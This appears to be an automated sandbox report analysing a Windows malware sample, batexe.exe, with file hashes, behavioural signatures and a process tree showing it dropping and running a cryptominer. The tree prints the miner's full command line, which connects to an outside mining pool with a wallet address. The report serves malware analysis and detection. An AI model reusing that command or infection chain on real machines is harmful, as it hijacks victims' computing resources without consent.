Analysis
-
max time kernel
299s -
max time network
293s -
platform
windows10-2004_x64 -
resource
win10v2004-20240221-ja -
resource tags
arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
24/02/2024, 12:02
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240221-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20240221-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-1392040655-2056082574-619088944-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 2492 b2e.exe 1728 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 1728 cpuminer-sse2.exe 1728 cpuminer-sse2.exe 1728 cpuminer-sse2.exe 1728 cpuminer-sse2.exe 1728 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/960-8-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 960 wrote to memory of 2492 960 batexe.exe 89 PID 960 wrote to memory of 2492 960 batexe.exe 89 PID 960 wrote to memory of 2492 960 batexe.exe 89 PID 2492 wrote to memory of 2352 2492 b2e.exe 90 PID 2492 wrote to memory of 2352 2492 b2e.exe 90 PID 2492 wrote to memory of 2352 2492 b2e.exe 90 PID 2352 wrote to memory of 1728 2352 cmd.exe 93 PID 2352 wrote to memory of 1728 2352 cmd.exe 93
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:960 -
C:\Users\Admin\AppData\Local\Temp\5CB6.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\5CB6.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\5CB6.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2492 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5FE3.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1728
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
10.8MB
MD5d33dc79327933a2087d4310dc9f0677c
SHA1612f95b39cf2c5e1e63c0c64073e265995acbdd3
SHA256a18acaff45557cdad35e234528ac1861b2412750ff11b2ee38023d478d284d1f
SHA512055be8d98db7bcfac9b1c27e05de5217db767166619d0ab7dfdd66b6caaab305cbc3d390f40903dfa7f360e33acc5fbeafe94403f18ddcd0c9b2d2e41ed26e42
-
Filesize
3.6MB
MD5a202c43df284047b4026052f2015b382
SHA1531129cc3cff7410080574b0fd1f8404c8c343d6
SHA25622e0189ee48633fcbb780d8ce081c027adcfd289ce6b90e0dddf506b78a59a66
SHA51203192f196ccd2100255c1fad56bd14019876f87509f7215f1af469e93a9e4a8686d7bd18a1273d46e05711d1017a87948b4299a6d4597fa66001b29ee310cea2
-
Filesize
4.4MB
MD55836d46e55171c3b25664c3c42702547
SHA133e6872ed755d3e42ede1ea7e92e14345ae8434f
SHA256fb98f351df48f876ac7a21fb825731812ba1396a0109b11a853ed62b5c0b3ff7
SHA5127ead011fd273eb054556b66192584ab913395556519009f3bb1593ee03ef6166d9b570aba3dea6d1b8c690b6ed9961cb65d932b16722b72fe2fedc8ae119b0c4
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
916KB
MD561594f4812f6f7da4693c3cf51866fe3
SHA1c881f1a7f5e2bee826cbfae4a9aa8981e071c468
SHA256021a6bbaf708bc9e8c8aef82050e522201b74d436020e1b6231b4b495c110dbe
SHA5128ccac06d4fb9ea8b5260d79bec2c3f168b6cd82d070d5f75140db853a96a25deb5a45fe6b99bfbdd4623d3c75f4a0fd4d63a7899d3dd5f48759717f716626011
-
Filesize
1.0MB
MD572cca940913c5c18f45109f687af4d47
SHA1d0492d6fc91940363c609b67862a9a8c2936a5d3
SHA256fb4c61f92c6b06311f699a5c6bbd78802d9febd30d22d30586f44b1ce6c18008
SHA5122662109fec5c568be352502232602fef72fbb0fb570de3c620d1fc515b56e04baacf1d5e5e6b44431bd117b875c4f296670632354a2a6b40922374a9c1206e45
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
494KB
MD5ef087e2eca882e54ae98303b0dfed545
SHA1130be2fcc394521a18be0aa174d87e853991f9d2
SHA256db89a80aca05c8f6d63abe7ded06b671c8ed9968eba7c2894223ec043457d6d6
SHA5121d7fdadeea9ea46a148e53883dbfefd0cb42ee3a6b2a6d3f1ef7b873feb4877a9138b1879b56a4d390a7f18fd99dc635d44bbfdf984e45e8aa810b5323304e33
-
Filesize
938KB
MD5d4e7dbb2cb364511035d9eab666fd875
SHA1588704f37eaa51a23f5274e171c201afdf9135f6
SHA256d5c8202d8df85fdbc767f383a3b96e6b3e4c7891524ace69d7360ada3e06977b
SHA5121c24586f342847a242037efb9387aa62edeaa670c99de815daf78260796060eab21d6249adbfeb44770bd20973ff12986184a27b99d0c1b2d1807125095181fa
-
Filesize
344KB
MD5ee028c7a7c26c425c93156f4bb3a0a40
SHA198081a6dfb708c79f169acb4f4b95057e8bb5ddf
SHA2568edcc78988e501913e93b95a234e068ebc6506bb3aa56ef0f925cc9685209fcf
SHA5124a58235cef05c124adcdfe42d64adce8af4c33b45e845339ec47e127299e34971262d54bcd038998fc7a9655d44e3f5854f5e50e68511118670e34f23c7949e9
-
Filesize
882KB
MD5486ce5a1e4de6cbfbdd5e99c70d5c08c
SHA1ec3ad0a27268a5265056e40eeddd9f4670523e1b
SHA2561d1dc472c97e234d66b9a406a1aca875f24293d754af250d982f4904eeabc895
SHA51255b7a73b6de5dad8e1f4bb80b91d0a46576e925896da75e1c49911949b0b2541c8a51d527f6d260e2e1265f9d0acb4191dbd2d8d931dcd2e497e2d1adca94f7a
-
Filesize
276KB
MD5488bc7999ac1f0dde0dc942ab5fb9ade
SHA1f8ded65ea922a2389c570dcbf4b7c0c1b027cf02
SHA256089c6bbdc5f8fa3e076a2616982035414b5db01d136bfb52fb63fa043efe5f45
SHA512270f1b2bab13820ace4621e6a99deffd04f17f2564ab941863e7060f4f61aa516f27a9efb1fb4b080311a3815cd40ba24fd0177efc5d813eccfe2e22ea85c460
-
Filesize
181KB
MD5ff9590d9c2a651f67cd709516aa540c8
SHA110052f0d8c8bae9a7fa7543a9bd53b3820a4c546
SHA256f3457a39135b14fd2081f94fe38dbb8e7aee2c2ae2fe0e42bc78f050149f3b83
SHA5128a7ed2cb18431b1f47eca02046992c46244639672ae7ff36a070cf82dcf9a814af45b2eef6c82468c255d1117f99ac1c92cd9f56e1e204dcd8dd515fc9ad1d32
-
Filesize
327KB
MD5827af015a5a514b8b0a2f4ad63648431
SHA10851bc2e7629d46e5d6bf745895921b211776824
SHA256fc0c57e5aec23105c1523b5074c1c601da2e499fb9762b94ac57fec9167480ca
SHA512237770f28a14a19a60a346b362badfca14bc5d986258394ad8bbba078481285d62d114f7255178da1081a615048f838a6925de6e0f466753e7e6e99a8eb47cf5
-
Filesize
484KB
MD5ce30b151e7f5e33fe51b80e517b7a73f
SHA16e82333a1bcb4226f467b36ed27c828c8380f0f4
SHA2566d6b1bd9909e055082f3ac7e42f035abd84eea4f7ac834e110744964a5370b71
SHA512613a555a92973aee3e7a956210f042fd7665444905ce1cdb1a16aeb7141a7a4fae31519caa9e1681840105190ec3723bcb7a9bfd96a43a69422e9ec1ff0bffd9